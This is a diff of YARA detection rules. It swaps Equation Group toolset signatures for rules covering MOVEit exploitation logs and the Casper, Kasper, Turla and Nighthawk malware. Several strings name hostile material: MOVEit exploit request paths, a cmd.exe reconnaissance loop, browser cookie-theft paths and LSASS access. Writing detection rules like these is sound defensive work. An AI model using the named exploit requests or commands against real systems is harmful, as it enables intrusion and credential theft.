+		author = "Florian Roth"
+		id = "a7c521b8-c654-51dd-9d5b-4ba883feffe3"
+		date = "2023-06-01"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1170-L1199"
+		reference = "https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_moveit_0day_jun23.yar#L43-L56"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "1493f78e74503c367e3c5d8eac32167a7ad34d2435eba00e1f7bf864682e10a5"
-		score = 75
+		logic_hash = "26674d8dea5cb2e95e442c4c75d80ca610f7373f0b216c0b1c83a5b1f9f70316"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "3366b4bbf265716869a487203a8ac39867920880990493dd4dd8385e42b0c119"
-		hash2 = "830538fe8c981ca386c6c7d55635ac61161b23e6e25d96280ac2fc638c2d82cc"
-		hash3 = "05031898f3d52a5e05de119868c0ec7caad3c9f3e9780e12f6f28b02941895a4"
-		hash4 = "d9756e3ba272cd4502d88f4520747e9e69d241dee6561f30423840123c1a7939"
-		hash5 = "8e4a76c4b50350b67cabbb2fed47d781ee52d8d21121647b0c0356498aeda2a2"
-		hash6 = "6059bec5cf297266079d52dbb29ab9b9e0b35ce43f718022b5b5f760c1976ec3"
-		hash7 = "d859ce034751cac960825268a157ced7c7001d553b03aec54e6794ff66185e6f"
-		hash8 = "ee3e3487a9582181892e27b4078c5a3cb47bb31fc607634468cc67753f7e61d7"
-		hash9 = "464b4c01f93f31500d2d770360d23bdc37e5ad4885e274a629ea86b2accb7a5c"
+		tags = ""
 
-	strings:
-		$s1 = "WARNING:  Session may not have been closed!" fullword ascii
-		$s2 = "EXEC Packet Processed" fullword ascii
-		$s3 = "Failed to insert the command into command list." fullword ascii
-		$s4 = "Send_Packet: Trying to send too much data." fullword ascii
-		$s5 = "payloadLength >= MAX_ALLOW_SIZE." fullword ascii
-		$s6 = "Wrong Payload Size" fullword ascii
-		$s7 = "Unknown packet received......" fullword ascii
-		$s8 = "Returned eax = %08x" fullword ascii
+	strings:
+		$x1 = "POST /moveitisapi/moveitisapi.dll action=m2 " ascii
+		$x2 = " GET /human2.aspx - 443 " ascii
 
 	condition:
-		( uint16( 0 ) == 0x457f and filesize < 6000KB and ( 2 of ( $s* ) ) ) or ( 5 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_EQGRP_Eligiblebombshell_Generic : FILE
+rule SIGNATURE_BASE_LOG_EXPL_Moveit_Exploitation_Indicator_Jun23_2
 {
 	meta:
-		description = "EQGRP Toolset Firewall - from files eligiblebombshell_1.2.0.1.py, eligiblebombshell_1.2.0.1.py"
-		author = "Florian Roth (Nextron Systems)"
-		id = "7abe53f6-9880-523a-b71f-6e3850047764"
-		date = "2016-08-16"
+		description = "Detects a potential compromise indicator found in MOVEit Transfer logs"
+		author = "Florian Roth"
+		id = "1527f5e3-071d-5152-9452-9c4472d258f2"
+		date = "2023-06-03"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1201-L1218"
+		reference = "https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_moveit_0day_jun23.yar#L58-L79"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a2e13300736f99aff30c7b4f7f0b148d62ecb1e72435a3e15e4f85b30d904ffd"
-		score = 75
+		logic_hash = "56328d078801a702ad47f01f356df6f00be8da593d03c549e77312af9b47b5be"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "dd0e3ae6e1039a755bf6cb28bf726b4d6ab4a1da2392ba66d114a43a55491eb1"
-		hash2 = "dd0e3ae6e1039a755bf6cb28bf726b4d6ab4a1da2392ba66d114a43a55491eb1"
+		tags = ""
 
 	strings:
-		$s1 = "logging.error(\"       Perhaps you should run with --scan?\")" fullword ascii
-		$s2 = "logging.error(\"ERROR: No entry for ETag [%s] in %s.\" %" fullword ascii
-		$s3 = "\"be supplied\")" fullword ascii
+		$a1 = "Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/105.0.5195.102+Safari/537.36" ascii
+		$a2 = "Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/105.0.5195.54+Safari/537.36" ascii
+		$s1 = " POST /moveitisapi/moveitisapi.dll" ascii
+		$s2 = " POST /guestaccess.aspx"
+		$s3 = " POST /api/v1/folders/"
+		$s4 = "/files uploadType=resumable&"
+		$s5 = " action=m2 "
 
 	condition:
-		( filesize < 70KB and 2 of ( $s* ) ) or ( all of them )
+		1 of ( $a* ) and 3 of ( $s* ) or all of ( $s* )
 }
-rule SIGNATURE_BASE_EQGRP_Ssh_Telnet_29 : FILE
+rule SIGNATURE_BASE_LOG_EXPL_Moveit_Exploitation_Indicator_Jun23_3
 {
 	meta:
-		description = "EQGRP Toolset Firewall - from files ssh.py, telnet.py"
-		author = "Florian Roth (Nextron Systems)"
-		id = "cc6edf63-f7ef-579a-82c5-28e5012561e0"
-		date = "2016-08-16"
+		description = "Detects a potential compromise indicator found in MOVEit DMZ Web API logs"
+		author = "Nasreddine Bencherchali"
+		id = "113a501f-d9ed-51fd-82cd-ccb6f02833bd"
+		date = "2023-06-13"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1220-L1241"
+		reference = "https://attackerkb.com/topics/mXmV0YpC3W/cve-2023-34362/rapid7-analysis"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/vuln_moveit_0day_jun23.yar#L81-L94"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e93a54f4de089d460bfb966feacc377c0467863f481a210c81970f4909fb3bd8"
-		score = 75
+		logic_hash = "2eaa06c31687c6368f036a705fdc1b1c42355f19c098ae764a998039cc4aebb5"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "630d464b1d08c4dfd0bd50552bee2d6a591fb0b5597ecebaa556a3c3d4e0aa4e"
-		hash2 = "07f4c60505f4d5fb5c4a76a8c899d9b63291444a3980d94c06e1d5889ae85482"
+		tags = ""
 
 	strings:
-		$s1 = "received prompt, we're in" fullword ascii
-		$s2 = "failed to login, bad creds, abort" fullword ascii
-		$s3 = "sending command \" + str(n) + \"/\" + str(tot) + \", len \" + str(len(chunk) + " fullword ascii
-		$s4 = "received nat - EPBA: ok, payload: mangled, did not run" fullword ascii
-		$s5 = "no status returned from target, could be an exploit failure, or this is a version where we don't expect a stus return" ascii
-		$s6 = "received arp - EPBA: ok, payload: fail" fullword ascii
-		$s7 = "chopped = string.rstrip(payload, \"\\x0a\")" fullword ascii
+		$s1 = "TargetInvocationException" ascii
+		$s2 = "MOVEit.DMZ.Application.Folders.ResumableUploadFilePartHandler.DeserializeFileUploadStream" ascii
 
 	condition:
-		( filesize < 10KB and 2 of them ) or ( 3 of them )
+		all of ( $s* )
 }
-rule SIGNATURE_BASE_EQGRP_Tinyexec : FILE
+
+rule SIGNATURE_BASE_Kaspermalware_Oct17_1 : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - from files tinyexec"
+		description = "Detects Kasper Backdoor"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b783bafd-52e2-59e8-98ab-47de3250415e"
-		date = "2016-08-16"
+		id = "7201d8ee-50ee-5a5c-a5b8-ee36c78b0d6e"
+		date = "2017-10-24"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1245-L1258"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_kasper_oct17.yar#L13-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "19b8d7e946d72424f81cd48ad4bf8791bf50a4cc146866e55ad501443a8d1e45"
+		logic_hash = "15758407fb3039f1453f13d579d7df9525645e4717078f6b1fa482ab335e3a56"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "758bdaf26a0bd309a5458cb4569fe1c789cf5db087880d6d1676dec051c3a28d"
 
 	strings:
-		$s1 = { 73 68 73 74 72 74 61 62 00 2E 74 65 78 74 }
-		$s2 = { 5A 58 55 52 89 E2 55 50 89 E1 }
+		$x1 = "\\Release\\kasper.pdb" ascii
+		$x2 = "C:\\D@oc@um@en@ts a@nd Set@tings\\Al@l Users" wide
 
 	condition:
-		uint32( 0 ) == 0x464c457f and filesize < 270 and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 7000KB and ( pe.imphash ( ) == "2bceb64cf37acd34bc33b38f2cddfb61" or 1 of them )
 }
-rule SIGNATURE_BASE_EQGRP_Callbacks
+rule SIGNATURE_BASE_HKTL_MAL_Nighthawk_Nov_2022_1 : NIGHTHAWK BEACON FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - Callback addresses"
-		author = "Florian Roth (Nextron Systems)"
-		id = "dd1fbe09-4def-562d-825d-e790dc2c3dd9"
-		date = "2016-08-16"
+		description = "Detect the Nighthawk dropped beacon"
+		author = "Arkbird_SOLG"
+		id = "a46d5034-e8e3-5c30-90d9-ea97b8384341"
+		date = "2022-11-22"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1260-L1272"
+		reference = "https://web.archive.org/web/20221125224850/https://www.proofpoint.com/us/blog/threat-insight/nighthawk-and-coming-pentest-tool-likely-gain-threat-actor-notice"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_nighthawk_c2.yar#L32-L50"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "34881cf8f9f29482a1e129f0f61470d4cc3fa6b78b9f6dda25862371896deca7"
+		logic_hash = "8dec7752ee6e1af87129ce7ac09130f94a20807c4f45ceb1fce434358ac727bf"
 		score = 75
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "NIGHTHAWK, BEACON, FILE"
+		hash1 = "0551ca07f05c2a8278229c1dc651a2b1273a39914857231b075733753cb2b988"
+		hash2 = "9a57919cc5c194e28acd62719487c563a8f0ef1205b65adbe535386e34e418b8"
+		hash3 = "f3bba2bfd4ed48b5426e36eba3b7613973226983a784d24d7a20fcf9df0de74e"
 
 	strings:
-		$s1 = "30.40.50.60:9342" fullword ascii wide
+		$s1 = { 44 8b ff 45 33 c0 48 8d 15 [2] 0a 00 48 8d 4d c0 e8 [2] ff ff 45 33 c0 48 8d 15 [2] 0a 00 48 8d 4d 20 e8 [2] ff ff 45 33 c0 48 8d 15 [2] 0a 00 48 8d 4d 00 e8 [2] ff ff 45 33 c0 48 8d 15 [2] 0a 00 48 8d 4d e0 e8 [2] ff ff 33 d2 e9 ee 04 00 00 48 8d 44 24 68 48 89 44 24 20 41 b9 01 00 00 00 45 33 c0 48 8d 95 a0 00 00 00 ff 15 [2] 09 00 85 c0 0f 85 74 04 00 00 48 89 7c 24 28 48 89 7c 24 20 45 33 c9 45 33 c0 48 8d 15 [2] 0a 00 48 8b 4c 24 68 ff 15 [2] 09 00 85 }
+		$s2 = { 4d 85 c0 0f 84 83 00 00 00 49 21 18 33 d2 44 8d 43 01 33 c9 ff 15 [2] 08 00 48 8b f0 48 85 c0 74 6a 44 8d 43 04 48 8b d5 48 8b c8 ff 15 [2] 08 00 48 8b e8 48 85 c0 74 49 48 8d 44 24 70 33 d2 44 8d 4b 24 48 89 44 24 20 4c 8d 44 24 30 48 8b cd ff 15 [2] 08 00 8b }
+		$s3 = { 48 85 c0 0f 84 [2] 00 00 4d 8b cc 49 83 7c 24 18 08 72 04 4d 8b 0c 24 4d 8b c5 49 83 7d 18 08 72 04 4d 8b 45 00 49 8b ?? 49 83 ?? 18 08 72 03 49 8b }
+		$s4 = { 44 8b 44 24 44 4c 89 [2-3] 89 95 00 02 00 00 2b c7 8b d7 49 03 d0 48 03 d1 4c 8d 8d 00 02 00 00 44 8b c0 49 8b cf ff 15 [2] 04 00 33 d2 85 c0 0f 84 [2] ff ff 03 bd 00 02 00 00 8b 44 24 40 3b f8 48 8b 4d ?? 4c 8b }
 
 	condition:
-		1 of them
+		uint16( 0 ) == 0x5A4D and filesize > 60KB and all of ( $s* )
 }
-rule SIGNATURE_BASE_EQGRP_Extrabacon_Output
+rule SIGNATURE_BASE_URL_File_Local_EXE : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - Extrabacon exploit output"
+		description = "Detects an .url file that points to a local executable"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b2070ed7-e95a-534a-8f27-63c5ca9251b4"
-		date = "2016-08-16"
+		id = "8b157e98-7b69-5649-b1d8-40bd6b685bf6"
+		date = "2017-10-04"
 		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1274-L1290"
+		reference = "https://twitter.com/malwareforme/status/915300883012870144"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_url_to_local_exe.yar#L1-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5e71a4380dd30e68d89add1718976d3207a161d2d61fd4c3250fc4b10a0f53a0"
-		score = 75
-		quality = 85
-		tags = ""
+		logic_hash = "b85b723142f52ade68f6eb8ba54bb7dffafce0df6d1ae8a7c08b3ce621ccadd4"
+		score = 60
+		quality = 60
+		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "|###[ SNMPresponse ]###" fullword ascii
-		$s2 = "[+] generating exploit for exec mode pass-disable" fullword ascii
-		$s3 = "[+] building payload for mode pass-disable" fullword ascii
-		$s4 = "[+] Executing:  extrabacon" fullword ascii
-		$s5 = "appended AAAADMINAUTH_ENABLE payload" fullword ascii
+		$s1 = "[InternetShortcut]" ascii wide fullword
+		$s2 = /URL=file:\/\/\/C:\\[^\n]{1,50}\.exe/
 
 	condition:
-		2 of them
+		filesize < 400 and all of them
 }
-rule SIGNATURE_BASE_EQGRP_Unique_Strings
+rule SIGNATURE_BASE_Casper_Backdoor_X86 : FILE
 {
 	meta:
-		description = "EQGRP Toolset Firewall - Unique strings"
+		description = "Casper French Espionage Malware - Win32/ProxyBot.B - x86 Payload http://goo.gl/VRJNLo"
 		author = "Florian Roth (Nextron Systems)"
-		id = "08f5f1e3-ce4e-54ef-922f-50446edfcd70"
-		date = "2016-08-16"
-		modified = "2023-12-05"
-		reference = "Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1292-L1305"
+		id = "9e54f00c-74a7-56cc-87e5-8dec1233cbb5"
+		date = "2015-03-05"
+		modified = "2023-01-27"
+		reference = "http://goo.gl/VRJNLo"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_casper.yar#L4-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "070358ec9cccb5d9daa4e5a016d4f9a988b600d675484f06dc9a897cadf7af0c"
-		score = 75
+		hash = "f4c39eddef1c7d99283c7303c1835e99d8e498b0"
+		logic_hash = "027457a3d86c0a7924fd6eb09c4a753cc846ba45f0b04257d9eec396bbc27f75"
+		score = 80
 		quality = 85
-		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "FILE"
 
 	strings:
-		$s1 = "/BananaGlee/ELIGIBLEBOMB" ascii
-		$s2 = "Protocol must be either http or https (Ex: https://1.2.3.4:1234)"
+		$s1 = "\"svchost.exe\"" fullword wide
+		$s2 = "firefox.exe" fullword ascii
+		$s3 = "\"Host Process for Windows Services\"" fullword wide
+		$x1 = "\\Users\\*" ascii
+		$x2 = "\\Roaming\\Mozilla\\Firefox\\Profiles\\*" ascii
+		$x3 = "\\Mozilla\\Firefox\\Profiles\\*" ascii
+		$x4 = "\\Documents and Settings\\*" ascii
+		$y1 = "%s; %S=%S" fullword wide
+		$y2 = "%s; %s=%s" fullword ascii
+		$y3 = "Cookie: %s=%s" fullword ascii
+		$y4 = "http://%S:%d" fullword wide
+		$z1 = "http://google.com/" ascii
+		$z2 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MALC)" fullword ascii
+		$z3 = "Operating System\"" fullword wide
 
 	condition:
-		1 of them
+		( filesize < 250KB and all of ( $s* ) ) or ( 3 of ( $x* ) and 2 of ( $y* ) and 2 of ( $z* ) )
 }
-rule SIGNATURE_BASE_EQGRP_RC5_RC6_Opcode
+rule SIGNATURE_BASE_Casper_EXE_Dropper
 {
 	meta:
-		description = "EQGRP Toolset Firewall - RC5 / RC6 opcode"
+		description = "Casper French Espionage Malware - Win32/ProxyBot.B - Dropper http://goo.gl/VRJNLo"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b12a1a2c-8d32-5318-a658-6aa1a08c3263"
-		date = "2016-08-17"
+		id = "a901d045-6f9b-57e8-8347-6f78178b7231"
+		date = "2015-03-05"
 		modified = "2023-12-05"
-		reference = "https://securelist.com/blog/incidents/75812/the-equation-giveaway/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1307-L1326"
+		reference = "http://goo.gl/VRJNLo"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_casper.yar#L37-L58"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a79208c5924e1d5cc9db922f80403514e516eadb725393c1ebc9a6236ca90b98"
-		score = 75
+		hash = "e4cc35792a48123e71a2c7b6aa904006343a157a"
+		logic_hash = "8ffba5598078fdadf2d9e8ee7fe0fef8b3b89517490a379d46cab33cd0036d6e"
+		score = 80
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = { 8B 74 91 FC 81 EE 47 86 C8 61 89 34 91 42 83 FA 2B }
+		$s0 = "<Command>" fullword ascii
+		$s1 = "</Command>" fullword ascii
+		$s2 = "\" /d \"" fullword ascii
+		$s4 = "'%s' %s" fullword ascii
+		$s5 = "nKERNEL32.DLL" fullword wide
+		$s6 = "@ReturnValue" fullword wide
+		$s7 = "ID: 0x%x" fullword ascii
+		$s8 = "Name: %S" fullword ascii
 
 	condition:
-		1 of them
+		7 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Modifyaudit_Implant : FILE
+rule SIGNATURE_BASE_Casper_Included_Strings : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file modifyAudit_Implant.dll"
+		description = "Casper French Espionage Malware - String Match in File - http://goo.gl/VRJNLo"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0321f6c0-2250-5991-a1d9-f0598e13c665"
-		date = "2017-01-13"
+		id = "34ba474d-0858-534a-8f32-db5a709e8814"
+		date = "2015-03-06"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1337-L1353"
+		reference = "http://goo.gl/VRJNLo"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_casper.yar#L60-L83"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ec8b54f3489b1eeef491b03641805e0e4db0b5cbbb67a3ae3d37dad184f54b01"
-		score = 75
+		logic_hash = "8796f45e459747db6bc08f362db7b152242f9f5bda3b72ddfc739cc9dcdfc55f"
+		score = 50
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b7902809a15c4c3864a14f009768693c66f9e9234204b873d29a87f4c3009a50"
 
 	strings:
-		$s1 = "LSASS.EXE" fullword wide
-		$s2 = "hNtQueryInformationProcess" fullword ascii
-		$s3 = "hZwOpenProcess" fullword ascii
-		$s4 = ".?AVFeFinallyFailure@@" fullword ascii
+		$a0 = "cmd.exe /C FOR /L %%i IN (1,1,%d) DO IF EXIST"
+		$a1 = "& SYSTEMINFO) ELSE EXIT"
+		$c1 = "domcommon.exe" wide fullword
+		$c2 = "jpic.gov.sy" fullword
+		$c3 = "aiomgr.exe" wide fullword
+		$c4 = "perfaudio.dat" fullword
+		$c5 = "Casper_DLL.dll" fullword
+		$c6 = { 7B 4B 59 DE 37 4A 42 26 59 98 63 C6 2D 0F 57 40 }
+		$c7 = "{4216567A-4512-9825-7745F856}" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 90KB and ( all of ( $s* ) ) ) or ( all of them )
+		all of ( $a* ) or uint16( 0 ) == 0x5a4d and ( 1 of ( $c* ) )
 }
-rule SIGNATURE_BASE_Equationgroup_Modifyaudit_Lp : FILE
+rule SIGNATURE_BASE_Casper_Systeminformation_Output
 {
 	meta:
-		description = "EquationGroup Malware - file modifyAudit_Lp.dll"
+		description = "Casper French Espionage Malware - System Info Output - http://goo.gl/VRJNLo"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9dcfa774-0048-5bd9-ba7d-87bbdff9567a"
-		date = "2017-01-13"
+		id = "aaae200c-7ef1-52eb-be5b-36e0ad29ecef"
+		date = "2015-03-06"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1355-L1372"
+		reference = "http://goo.gl/VRJNLo"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_casper.yar#L85-L104"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a908d44b831a27bb584c5da936346f77f0e205658ec2ebe0e600004645894593"
-		score = 75
+		logic_hash = "83c6216bc3e7fadfe81b9bbaca7b14e3398e972f8298c99a8eb576a40e4b4e1b"
+		score = 70
 		quality = 85
-		tags = "FILE"
+		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2a1f2034e80421359e3bf65cbd12a55a95bd00f2eb86cf2c2d287711ee1d56ad"
 
 	strings:
-		$s1 = "Read of audit related process memory failed" fullword wide
-		$s2 = "** This may indicate that another copy of modify_audit is already running **" fullword wide
-		$s3 = "Pattern match of code failed" fullword wide
-		$s4 = "Base for necessary auditing dll not found" fullword wide
-		$s5 = "Security auditing has been disabled" fullword wide
+		$a0 = "***** SYSTEM INFORMATION ******"
+		$a1 = "***** SECURITY INFORMATION ******"
+		$a2 = "Antivirus: "
+		$a3 = "Firewall: "
+		$a4 = "***** EXECUTION CONTEXT ******"
+		$a5 = "Identity: "
+		$a6 = "<CONFIG TIMESTAMP="
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 3 of them ) or ( all of them )
+		all of them
 }
-rule SIGNATURE_BASE_Equationgroup_Processhide_Lp : FILE
+rule SIGNATURE_BASE_APT_MAL_LNX_Turla_Apr202004_1 : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file ProcessHide_Lp.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "b0842897-f591-5213-9a26-0f8732e6f3b8"
-		date = "2017-01-13"
+		description = "Detects Turla Linux malware x64 x32"
+		author = "Leonardo S.p.A."
+		id = "2da75433-b1c1-51b3-8f7a-a4442ca3de96"
+		date = "2020-04-24"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1374-L1393"
+		reference = "https://www.leonardocompany.com/en/news-and-stories-detail/-/detail/knowledge-the-basis-of-protection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_penquin.yar#L2-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "407045f5ac8eeec4403560de406e5d382d38ae2f34d0e4c7d3cc9b94debdfad8"
+		logic_hash = "1e07963c492f1e6264f01ee292e40b188ca325b76005d9d48e6dc198cb9bdcf4"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "cdee0daa816f179e74c90c850abd427fbfe0888dcfbc38bf21173f543cdcdc66"
+		hash1 = "67d9556c695ef6c51abf6fbab17acb3466e3149cf4d20cb64d6d34dc969b6502"
+		hash2 = "8ccc081d4940c5d8aa6b782c16ed82528c0885bbb08210a8d0a8c519c54215bc"
+		hash3 = "8856a68d95e4e79301779770a83e3fad8f122b849a9e9e31cfe06bf3418fa667"
+		hash4 = "1d5e4466a6c5723cd30caf8b1c3d33d1a3d4c94c25e2ebe186c02b8b41daf905"
+		hash5 = "2dabb2c5c04da560a6b56dbaa565d1eab8189d1fa4a85557a22157877065ea08"
+		hash6 = "3e138e4e34c6eed3506efc7c805fce19af13bd62aeb35544f81f111e83b5d0d4"
+		hash7 = "5a204263cac112318cd162f1c372437abf7f2092902b05e943e8784869629dd8"
+		hash8 = "8856a68d95e4e79301779770a83e3fad8f122b849a9e9e31cfe06bf3418fa667"
+		hash9 = "d49690ccb82ff9d42d3ee9d7da693fd7d302734562de088e9298413d56b86ed0"
 
 	strings:
-		$x1 = "Invalid flag.  Can only hide or unhide" fullword wide
-		$x2 = "Process elevation failed" fullword wide
-		$x3 = "Unknown error hiding process" fullword wide
-		$x4 = "Invalid process links found in EPROCESS" fullword wide
-		$x5 = "Unable to find SYSTEM process" fullword wide
-		$x6 = "Process hidden, but EPROCESS location lost" fullword wide
-		$x7 = "Invalid EPROCESS location for given ID" fullword wide
+		$ = "/root/.hsperfdata" ascii fullword
+		$ = "Desc| Filename | size |state|" ascii fullword
+		$ = "VS filesystem: %s" ascii fullword
+		$ = "File already exist on remote filesystem !" ascii fullword
+		$ = "/tmp/.sync.pid" ascii fullword
+		$ = "rem_fd: ssl " ascii fullword
+		$ = "TREX_PID=%u" ascii fullword
+		$ = "/tmp/.xdfg" ascii fullword
+		$ = "__we_are_happy__" ascii
+		$ = "/root/.sess" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 300KB and 1 of them ) or ( 3 of them )
+		uint16( 0 ) == 0x457f and filesize < 5000KB and 4 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Pwdump_Implant : FILE
+rule SIGNATURE_BASE_APT_MAL_LNX_Turla_Apr202004_1_Opcode : FILE
 {
 	meta:
-		description = "EquationGroup Malware - file pwdump_Implant.dll"
-		author = "Florian Roth (Nextron Systems)"
-		id = "55984c20-539e-5e51-b3c4-caa6157c993d"
-		date = "2017-01-13"
+		description = "Detects Turla Linux malware x64 x32"
+		author = "Leonardo S.p.A."
+		id = "03043f59-c81a-5423-bec1-6cd88f6e3c52"
+		date = "2020-04-24"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/tcSoiJ"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp.yar#L1395-L1410"
+		reference = "https://www.leonardocompany.com/en/news-and-stories-detail/-/detail/knowledge-the-basis-of-protection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_turla_penquin.yar#L35-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
